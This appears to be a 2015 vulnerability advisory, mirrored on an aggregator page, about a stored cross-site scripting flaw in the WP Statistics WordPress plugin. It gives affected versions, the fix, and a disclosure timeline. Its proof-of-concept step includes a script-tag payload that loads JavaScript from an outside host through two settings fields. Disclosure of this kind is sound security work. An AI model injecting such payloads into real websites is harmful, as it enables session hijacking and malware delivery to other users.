Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32051
HistoryMay 11, 2015 - 12:00 a.m.

Wordpress WP Statistics persistent cross site scripting

2015-05-1100:00:00
vulners.com
19

===========================================================
Stored XSS Vulnerability in WP Statistics Wordpress Plugin

. contents:: Table Of Content

Overview

  • Title :Stored XSS Vulnerability in WP Statistics Wordpress Plugin
  • Author: Kaustubh G. Padwad
  • Plugin Homepage: https://wordpress.org/plugins/wp-statistics/
  • Severity: Medium
  • Version Affected: 9.1.2 and mostly prior to it
  • Version Tested : 9.1.2
  • version patched: 9.1.3

Description

Vulnerable Parameter

  • Check for online users every:
  • Coefficient per visitor:

About Vulnerability

This plugin is vulnerable to a Stored cross site scripting vulnerability,This issue was exploited when administrator users with access to WP Statistics Setting in wordpress Above Vulbnerable parameter is vulnerable for stored XSS. A malicious administration can hijack other users session, take control of another administrator's browser or install malware on their computer.

Vulnerability Class

Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

Steps to Reproduce: (POC)

After installing the plugin

  • Goto settings –> WP Statistics
  • Put This payload in any above vulnerable parameter <SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
  • Click on the Save Changes you will see XSS in action
  • Reload the page or re navigate to page to make sure its stored

Mitigation

Update to 9.1.3

Change Log

https://wordpress.org/plugins/wp-statistics/changelog/

Disclosure

14-April-2015 reported to developer
15-April-2015 Fix by developer
15-April-2015 Public Disclosure
credits